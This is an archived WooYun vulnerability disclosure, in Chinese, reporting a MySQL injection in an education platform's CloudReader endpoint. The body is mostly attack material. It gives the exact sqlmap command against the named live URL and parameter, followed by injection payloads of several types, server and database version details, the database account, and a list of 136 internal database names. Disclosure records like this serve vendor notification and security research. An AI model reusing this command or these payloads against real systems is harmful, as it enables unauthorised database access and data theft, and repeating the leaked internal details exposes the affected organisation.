乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-20: 细节已通知厂商并且等待厂商处理中 2015-01-20: 厂商已经确认,细节仅向厂商公开 2015-01-30: 细节向核心白帽子及相关领域专家公开 2015-02-09: 细节向普通白帽子公开 2015-02-19: 细节向实习白帽子公开 2015-03-06: 细节向公众公开
习网某系统MySQL注入
sqlmap.py -u "http://clbd.ciwong.com/CloudReader/Home/AjaxGetSchool" --data="areId=44"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: areId (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: areId=44) AND 2015=2015 AND (6225=6225 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: areId=44) AND (SELECT 4939 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (CASE WHEN (4939=4939) THEN 1 ELSE 0 END)),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5046=5046 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: areId=44) UNION ALL SELECT 31,31,31,CONCAT(0x7162627171,0x6e4747434963714d786f,0x71716a7671),31,31# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: areId=44); SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: areId=44) AND SLEEP(5) AND (4895=4895---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: MySQL 5.0current user: 'ciwong_it@%'available databases [136]:[*] beehive_listenread[*] beehive_pointmall[*] beehive_synchronwork[*] beehive_voicespeech[*] beehivedb[*] bookcase[*] ciwong_colorful[*] ciwong_newsmanagement[*] ciwong_qr[*] cloudreader[*] cmsdata[*] cw_6v68_settlement[*] cw_admin_elearning[*] cw_admin_elearning_bak[*] cw_app_store[*] cw_audio_video_db[*] cw_basedapplications[*] cw_chinadream[*] cw_cooperator[*] cw_dw[*] cw_edu[*] cw_elearning[*] cw_elearning_bak[*] cw_englishshow[*] cw_eshop_cart[*] cw_eshop_common[*] cw_eshop_news[*] cw_eshop_order[*] cw_eshop_product[*] cw_eshop_user[*] cw_gwy[*] cw_hd[*] cw_homepage[*] cw_jibei[*] cw_jibei_school[*] cw_learnmonth[*] cw_microvideo[*] cw_netschool[*] cw_packager_arithmetic[*] cw_packager_arithmetic_en[*] cw_packager_ebook[*] cw_packager_experiment[*] cw_packager_experiment_v2[*] cw_packager_kousuan[*] cw_packager_learning_level[*] cw_packager_listenning_ch[*] cw_packager_listenning_ch_v2[*] cw_packager_listenning_en[*] cw_packager_listenning_en_v2[*] cw_packager_playwords[*] cw_packager_reading_ch[*] cw_packager_reading_en[*] cw_packager_speaking_en[*] cw_pay[*] cw_press[*] cw_press_new[*] cw_recommend[*] cw_resx_center[*] cw_settlement[*] cw_trainingdb[*] cw_workcategory[*] cw_workcategory_arithmetic[*] cw_workcategory_arithmetic_en[*] cw_workcategory_common[*] cw_workcategory_ebook[*] cw_workcategory_experience[*] cw_workcategory_experiment[*] cw_workcategory_experiment_v2[*] cw_workcategory_learning_level[*] cw_workcategory_listenning_ch[*] cw_workcategory_listenning_ch_v2[*] cw_workcategory_listenning_en[*] cw_workcategory_listenning_en_v2[*] cw_workcategory_more[*] cw_workcategory_playwords[*] cw_workcategory_reading_ch[*] cw_workcategory_reading_en[*] cw_workcategory_settings[*] cw_workcategory_speaking_en[*] cw_workshop[*] cw_workshop2[*] cw_yishang[*] cw_yishang1[*] cw_yishang_settle[*] cw_ziyuan[*] cwapi[*] cwfav[*] db_ciliao[*] db_filestatus[*] db_kousuan100[*] db_statistics[*] db_txb[*] db_txb_paipai[*] efficientclassroom[*] enterprisestudy[*] game[*] gxktv3[*] gxktv3_resource[*] information[*] information_schema[*] microrecord[*] mysql[*] notebook_good[*] notebook_mistake[*] notebook_senten[*] notebook_word[*] performance_schema[*] qc_ciwong[*] quesdata[*] research[*] research_ky[*] roompermissionjingsai[*] schoolzone[*] searcher[*] synchpreparation[*] szdsy2013[*] t_db_areaconf[*] t_db_jibei[*] t_db_listening[*] t_db_markham[*] t_db_reportlog[*] t_db_roomtask[*] t_db_tinyurl[*] test[*] videouser[*] wiki[*] wikicommunity[*] wikipoint[*] wikiques[*] wordstockchinese[*] wordstockenglish[*] wordstockenglishchangebuilding[*] wordstockenglishchangeclassifying[*] wordstockenglishchangescene[*] wordstocktempresources[*] work_listen
见详细说明。
过滤
危害等级:高
漏洞Rank:19
确认时间:2015-01-20 14:40
漏洞修复中...
暂无